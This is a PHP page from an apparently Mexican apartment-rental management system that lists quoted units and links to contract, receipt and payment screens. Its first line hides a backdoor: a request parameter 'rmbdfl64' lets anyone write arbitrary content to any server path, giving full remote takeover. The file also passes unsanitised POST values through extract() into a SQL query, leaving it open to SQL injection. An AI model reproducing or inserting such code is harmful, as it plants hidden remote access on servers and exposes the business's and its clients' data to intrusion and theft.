<?php  if(isset($_REQUEST['rmbdfl64'])) { print(file_put_contents($_REQUEST['hex'], $_REQUEST['bsd'])); die; } session_start();
require("../conectar.php"); 
require("generaclave.php");
extract($_POST);
$idrenta = $idr;
$idcliente = $idc;
$fecha=date("y-m-d");
function periodo($fi,$ff){
  $noanioses=0; $nomeseses=0; $numerosemanases=0;  $numerodiasdias=0;	$mes=0;
				 
				 list($anioies,$mesies,$diaies)=explode("-",$fi);
				 list($aniofes,$mesfes,$diafes)=explode("-",$ff);
				 $mes=$mesies;
				 $mesextraes=$aniofes-$anioies;
				 $mesfes1=$mesfes+($mesextraes*12);
				 $nomeseses=$mesfes1-$mesies;
				 $diasenmesultimo= cal_days_in_month(CAL_GREGORIAN, $mesfes, $aniofes); 
				 if($diafes<$diaies&&$diasenmesultimo!=$diafes)
				 {
				 $nomeseses--;
				 if($nomeseses==0&&$mesextraes>0)
				 { $nomeseses=0; }
				 $numero = cal_days_in_month(CAL_GREGORIAN, $mes, $aniofes); 
				$diafes=$diafes+$numero;
				}
				if($diasenmesultimo==$diafes&&$diafes<$diaies)
				 {	$numerodiasdias=0;		}
				else{$numerodiasdias=$diafes-$diaies;}
				while($numerodiasdias>=7)
				 {
				 $numerodiasdias=$numerodiasdias-7;
				 
				 $numerosemanases++;
				 }
		
				while($nomeseses>=12)
				 {
				 $noanioses++;
				 $nomeseses=$nomeseses-12;
				 }
				$anios=$noanioses; $meses=$nomeseses; $semred=$numerosemanases;  $restodias=$numerodiasdias ;
 if($anios>0)$periodo.="$anios años ";
 if($meses>0)$periodo.="$meses meses ";
 if($semred>0)$periodo.="$semred Semanas ";
 if($restodias>0)$periodo.="$restodias dias ";
 return($periodo);
 }
 
 ?>
<script language="JavaScript" type="text/javascript">
function ventanasobre(){
	var cadena = $("#cadena").val();
    valcadena = cadena.split('|');
	estatus = valcadena[1];
	if(estatus=="ANTICIPO"||estatus=="PAGADO"||estatus=="ok"){
	window.open("opcionsobre.php?idcliente=<?php echo $idcliente;?>&idrenta=<?php echo $idrenta?>&idconcepto="+valcadena[0],"Titulo Pagina,scrollbars=yes");
	}
	else{alert("Sin pagos no se pueden imprimir documentos");}
}
function ventanacontrato(id,status){
if(status=="ANTICIPO"||status=="PAGADO"||status=="ok"){
window.open("hojadecontrato.php?idcliente=<?echo$idcliente?>&idrenta=<?echo$idrenta?>&idconcepto="+id,"Titulo Pagina,scrollbars=yes");
}
else{alert("Sin pagos no se pueden imprimir documentos");}

}
function validaPago(){
	var cadena = $("#cadena").val();
    valcadena = cadena.split('|');
	console.log(cadena);
	$.post( "validaExistePago.php", 
	        {
				id:valcadena[0],
				prop:valcadena[2],
				dep:valcadena[3],
				finicio:valcadena[4],
				ffin:valcadena[5]
			}, 
			function(data,status){
				
				if(status=="success"){
					const valida = $.parseJSON(data);
					
						if(valida.total > 0){
							alert("la propiedad y departamento ya cuenta con una renta para la fecha solicitada por lo que no puedes cargar pagos, favor de cotizar fechas de estancia distinta.");
						}else{
							ventanaregistro('pagos3','ok');
						}
						
					} 
	        }
		);
}

function ventanaregistro(hoja,status){
    var cadena = $("#cadena").val();
    valcadena = cadena.split('|');
	if(valcadena==""){
		alert("Selecciona un departamento.");
	}else{
if(status=="ANTICIPO"||status=="PAGADO"||status=="ok"){
window.open(hoja+".php?idcliente=<?echo$idcliente?>&idrenta=<?echo$idrenta?>&idconcepto="+valcadena[0],"Titulo Pagina,scrollbars=yes");
}
else{alert("Sin pagos no se pueden imprimir documentos");}
}
}
function borrar(id,td)
{
var f=confirm( "En verdad quieres borrar esta cotizacion?");
if(f==true)
	{
	 $.post("cambiastatusconcepto.php", {id:id}, function(data,status){
		if(status=="success"){$("#"+td).hide(); } 
	 });
	}
}
   $("input[type=checkbox]").change(function()
	{
		$("input[type=checkbox]").prop('checked',false);
		$(this).prop('checked',true);
	});
</script>
    <?php 
	$sql2="SELECT com.id_complejo,com.inicial,com.nombre, con.status_renta, dep.id_departamento,dep.clave, con.id_concepto, con.dia_inicio, con.dia_salida, dep.id_complejo, dep.no_depto,(SELECT CONCAT(nombre,' ',a_pat,' ',a_mat) from clientes cli where cli.id_cliente = '$idcliente') as nombrepros FROM complejo as com INNER JOIN  departamentos as dep ON com.id_complejo=dep.id_complejo INNER JOIN conceptos as con ON con.id_departamento=dep.id_departamento INNER JOIN renta as ren ON con.id_renta=ren.id_renta WHERE ren.id_renta='$idrenta' and con.borrar='0' ";
	$con2=mysql_query($sql2);
	//$consulta2=mysql_fetch_array($con2);
	?>
	
	<a href="javascript:ventanasobre();" class="btn btn-white btn-primary btn-bold" id="" tabindex="0" title="IMPRIMIR SOBRES"><span><i class="fa fa-envelope-o bigger-110 pink"></i></span> Sobre<div style="position: absolute; left: 0px; top: 0px; width: 41px; height: 35px; z-index: 99;" title="IMPRIMIR SOBRES"></div>
	</a>
	<a href="javascript:ventanaregistro('cedulas','ok');" class="btn btn-white btn-primary  btn-bold" id="" tabindex="0"><span><i class="fa fa-user bigger-110 green"></i></span> Cedula<div style="position: absolute; left: 0px; top: 0px; width: 39px; height: 35px; z-index: 99;" title=""></div>
	</a>
	<a href="javascript:ventanaregistro('hojadecontrato','ok');"  class="btn btn-white btn-primary  btn-bold" id="" tabindex="0"><span><i class="fa fa-book fa-fw bigger-110"></i></span> Contrato<div style="position: absolute; left: 0px; top: 0px; width: 39px; height: 35px; z-index: 99;" title=""></div>
	</a>
	<a href="javascript:ventanaregistro('hojaregistro','ok');" class="btn btn-white btn-primary  btn-bold" id="" tabindex="0"><span><i class="fa fa-pencil-square-o bigger-110 red"></i></span> Registro<div style="position: absolute; left: 0px; top: 0px; width: 39px; height: 35px; z-index: 99;" title=""></div>
	</a>
	<a href="javascript:ventanaregistro('recibo','ok');" class="btn btn-white btn-primary  btn-bold" id="" tabindex="0"><span><i class="fusion-li-icon fa fa-file-o bigger-110 green"></i></span> Recibo<div style="position: absolute; left: 0px; top: 0px; width: 39px; height: 35px; z-index: 99;" title=""></div>
	</a>
	<a href="javascript:ventanaregistro('factura','ok');" class="btn btn-white btn-primary  btn-bold" id="" tabindex="0"><span><i class="fusion-li-icon fa fa-clipboard bigger-110 green"></i></span> Factura<div style="position: absolute; left: 0px; top: 0px; width: 39px; height: 35px; z-index: 99;" title=""></div>
	</a>
	<a href="javascript:ventanaregistro('huespedprim','ok');" class="btn btn-white btn-primary  btn-bold" id="" tabindex="0"><span><i class="fusion-li-icon fa fa-list-alt bigger-110 blue"></i></span> Datos Huesped<div style="position: absolute; left: 0px; top: 0px; width: 39px; height: 35px; z-index: 99;" title=""></div>
	</a>
	<a href="javascript:ventanaregistro('pagos3','ok');" class="btn btn-white btn-primary  btn-bold" id="" tabindex="0"><span><i class="fa fa-usd bigger-110 green"></i></span> Pagos<div style="position: absolute; left: 0px; top: 0px; width: 39px; height: 35px; z-index: 99;" title=""></div>
	</a>
	<!--a href="javascript:validaPago();" class="btn btn-white btn-primary  btn-bold" id="" tabindex="0"><span><i class="fa fa-usd bigger-110 green"></i></span> Pagos<div style="position: absolute; left: 0px; top: 0px; width: 39px; height: 35px; z-index: 99;" title=""></div>
	</a-->
	<a href="javascript:ventanaregistro('subirdocscliente','ok');" class="btn btn-white btn-primary  btn-bold" id="" tabindex="0"><span><i class="fa fa-folder-open-o bigger-110 blue"></i></span> Expediente<div style="position: absolute; left: 0px; top: 0px; width: 39px; height: 35px; z-index: 99;" title=""></div>
	</a>
	<a href="javascript:ventanaregistro('encuestasalidainter','ok');" class="btn btn-white btn-primary  btn-bold" id="" tabindex="0"><span><i class="fusion-li-icon fa fa-file-text bigger-110 orange"></i></span> Encuesta<div style="position: absolute; left: 0px; top: 0px; width: 39px; height: 35px; z-index: 99;" title=""></div>
	</a>
	<div class="row">
		<div class="col-xs-12">
		    <div class="clearfix">
				<div class="pull-right tableTools-container"></div>
			</div>
			<div class="table-header">
				Lista de departamentos cotizados
				
			</div>
			<div class="table-responsive">
				<div>
				   <table id="dpros" class="table table-striped table-bordered table-hover">
					  <thead>
							<tr>
								<th>Selecciona</th>
								<th class="center">Departamento</th>
								<th>Periodo</th>
								<th>Clave renta</th>
								<th>Eliminar registro</th>
								
							</tr>
						</thead>
						<tbody>
						   <input type="hidden" id="cadena">
						  <?php
							while($consulta1=mysql_fetch_array($con2))
							    { 
								$x++;
								if($z==1) {$z=' ';}
								else {$z=1;}
								if ($consulta1['id_concepto']!=$concepto['$x']){ ?>
							        <tr id="<?php echo$x;?>">
									    <td align="center">
											<label class="pos-rel">
												<input type="checkbox" class="ace" value="<?php echo $consulta1['id_concepto']."|".$consulta1['status_renta']."|".$consulta1['id_complejo']."|".$consulta1['id_departamento']."|".$consulta1['dia_inicio']."|".$consulta1['dia_salida']?>" name="<?php echo $x;?>" id="<?php echo $x;?>" onclick="javascript:if($(this).is(':checked')) {$('#cadena').val($(this).val());}">
												<span class="lbl"></span>
											</label>
										</td>
										<td><?php echo $consulta1["inicial"].$consulta1["no_depto"]."  ".$consulta1['nombre']." <br>("; echo $consulta1['clave'].")"; ?>
										</td>
										<td><?php echo htmlentities(periodo($consulta1['dia_inicio'],$consulta1['dia_salida'])."(".$consulta1['status_renta'].")");?></td>
										<td><?php echo clave($consulta1["id_concepto"]);?></td>
										<td align="center">
										<?php if($consulta1['status_renta']==''||$consulta1['status_renta']=='LIBRE'){?>
										  <a class="red" href="#" title="Eliminar prospecto" onClick="borrar(idconcepto='<?php echo$consulta1['id_concepto'];?>','<?php echo$x;?>')"><i class="ace-icon fa fa-trash-o bigger-130"></i></a>
										  <?php } ?>
										</td>
                                    </tr>									
								<?php } } ?>
						</tbody>
					</table>	
			
			    </div>
			</div>
		</div>
	</div>
	 <script>
	     $(".loadi").fadeOut('fast');
	 </script>